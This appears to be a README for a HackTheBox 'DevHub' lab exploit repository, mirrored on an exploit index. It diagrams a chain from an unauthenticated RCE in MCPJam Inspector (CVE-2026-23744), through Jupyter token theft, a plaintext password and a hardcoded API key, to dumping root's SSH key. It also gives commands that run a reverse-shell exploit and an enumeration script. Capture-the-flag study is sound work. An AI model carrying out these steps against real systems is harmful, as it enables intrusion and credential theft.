Share
## https://sploitus.com/exploit?id=AC6E4A52-9139-53AB-92DA-7E77FED988C5
# HackTheBox โ DevHub
## CVE-2026-23744 | MCPJam Inspector Unauthenticated RCE
**Difficulty:** Medium
**OS:** Linux
**User:** mcp-dev โ analyst
**Root:** via OPSMCP hidden API credential dump
---
## Exploitation Chain
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-23744 โ RCE on port 6274 โ
โ Unauthenticated POST โ /api/mcp/connect โ
โโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
Shell as mcp-dev
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ portfwd 8888 โ Jupyter Notebook Token Grab โ
โโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
Browser โ http://127.0.0.1:8888
โ
Shell as analyst via notebook cell
credentials: JupyterN0tebook!2026
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ cat /opt/opsmcp/server.py โ
โ Hardcoded API Key discovered โ
โโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
portfwd 5000 โ OPSMCP API
โ
ops._admin_dump โ target=ssh_keys โ confirm=true
โ
/root/.ssh/id_rsa dumped
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ ssh -i root_id_rsa root@devhub.htb โ
โ ROOT โ
โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
## Files
| File | Description |
|---|---|
| `exploit.py` | CVE-2026-23744 RCE exploit with vuln check |
| `devhub_enum.py` | Local enumeration โ Jupyter, MCP, Python, privesc |
## Usage
```bash
# Exploit
python3 exploit.py -t devhub.htb -l -r 4444
# Enumeration (once on box)
python3 devhub_enum.py --section all
python3 devhub_enum.py --section jupyter
```
## Disclaimer
For educational purposes and authorized testing only.